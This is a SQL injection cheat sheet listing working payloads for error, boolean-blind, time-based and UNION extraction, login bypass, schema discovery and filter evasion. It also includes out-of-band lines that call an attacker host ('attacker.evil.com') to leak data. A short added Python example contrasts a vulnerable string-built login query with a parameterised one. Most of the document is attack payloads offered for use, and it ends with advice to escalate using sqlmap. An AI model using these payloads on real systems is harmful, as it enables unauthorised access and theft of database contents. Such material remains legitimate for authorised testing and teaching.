SQL Injection Manual Cheat Sheet
Basic SQL Injection Payloads
'
# A lone quote breaks the string literal; a syntax error suggests the input reaches the query unescaped
' OR 1=1--
# Always true condition, used to bypass filters or logic
' OR '1'='1'--
# String-based version of a true condition
' AND 1=2--
# Always false condition, useful for behavior comparison
Conditional Extraction (Boolean-Based Blind SQLi)
' AND 1=1--
# True condition, page should load normally
' AND 1=2--
# False condition, page should behave differently (e.g. blank/error)
' AND LENGTH(database())=8--
# Tests if the length of the database name is 8
' AND SUBSTRING(database(),1,1)='a'--
# Checks if the first character of the database name is 'a'
Time-Based Blind SQLi
' AND IF(1=1, SLEEP(5), 0)--
# If the condition is true, the response is delayed by 5 seconds (MySQL)
'; IF(1=1) WAITFOR DELAY '0:0:5'--
# Time delay for MSSQL when condition is true
UNION-Based SQL Injection
Finding Number of Columns
' ORDER BY 1--
# Orders by column 1; use increasing numbers to detect the valid number of columns
' ORDER BY 2--
# If this works, there are at least 2 columns
' ORDER BY 3--
# Keep increasing until an error appears; the last number that works is the column count
Extracting Data via UNION
' UNION SELECT NULL, NULL--
# Basic UNION test; the number of NULLs must match the column count found above
' UNION SELECT 1, database()--
# Returns current database name (if reflected on the page)
' UNION SELECT 1, version()--
# Returns DBMS version info
' UNION SELECT username, password FROM users--
# Attempts to extract data from the 'users' table
Login Bypass via SQLi
admin'--
# Comments out the rest of the query, so the password check is skipped (requires a user named 'admin')
admin' OR '1'='1'--
# Always-true condition; matches every row, so no valid password is needed
' OR 1=1 LIMIT 1--
# Always-true condition restricted to the first row of the result
Information Schema Discovery
' AND (SELECT COUNT(*) FROM information_schema.tables)=10--
# Tests how many tables exist
' AND (SELECT table_name FROM information_schema.tables LIMIT 1)='users'--
# Checks if the first table is named 'users'
Extracting Data Blindly
' AND SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 0,1),1,1)='u'--
# Checks if the first letter of the first table is 'u'
Out-of-Band SQLi Examples
'; EXEC xp_dirtree '\\attacker.evil.com\leak'--
# Triggers DNS query to attacker-controlled domain (MSSQL)
'; SELECT load_file('\\\\attacker.evil.com\\x')--
# MySQL attempts to load a file from a UNC path, which results in an external DNS/HTTP call
Bypass & Obfuscation Tricks
'UNION/**/SELECT/**/NULL,NULL--
# Inline comments replace whitespace to evade basic WAF keyword/whitespace filters
'UnIoN sEleCt 1,2--
# Case manipulation to evade filters
' OR 1=1#
# Alternative comment style using hash
' OR 1=1/*
# C-style comment ending
' OR 'a' + 'b' = 'ab'--
# String concatenation with '+' (MSSQL syntax), used for bypass or obfuscation
Login Bypass (POST Form Fields)
username=admin' --
# Ends query after username match
username=admin' OR 1=1--
# Bypasses authentication entirely
username=' OR 1=1--
# Same technique without naming a specific user
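Why the login-bypass payloads in the two login sections above work, and what stops them, as an added example that is not part of the original cheat sheet: a string-built query beside a parameterised one, both run against a constructed in-memory SQLite table (the `users` table, its columns and rows are assumed for the demo).

```python
import sqlite3


def make_db():
    """Constructed sample database (not from the page): plaintext passwords
    are used only to keep the demo short; real systems store password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable form: user input is pasted into the SQL text, so a quote
    followed by '--' ends the string literal and comments out the password
    check (this is exactly what admin'-- and ' OR '1'='1'-- exploit)."""
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Hardened form: a parameterised query. The SQL text is fixed and the
    values travel separately, so quotes and comment markers in the input are
    matched literally against the column and never change the query."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(payload_user, payload_pass="wrong"):
    """Returns (vulnerable_result, safe_result) for one login attempt."""
    conn = make_db()
    return (
        login_vulnerable(conn, payload_user, payload_pass),
        login_safe(conn, payload_user, payload_pass),
    )


if __name__ == "__main__":
    for user in ("admin'--", "' OR '1'='1'--", "' OR 1=1 LIMIT 1--", "admin"):
        print(repr(user), "->", compare(user))
```

With the bypass strings the vulnerable function returns "admin" while the parameterised one returns None; only the real credentials ("admin", "s3cret") log in through the safe path.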
Final Advice
- Test manually before using automation
- Always identify the DBMS (MySQL, MSSQL, PostgreSQL, etc.)
- Start with error detection, then escalate to extraction
- Use tools like Burp Suite, ffuf, and sqlmap after confirming manual success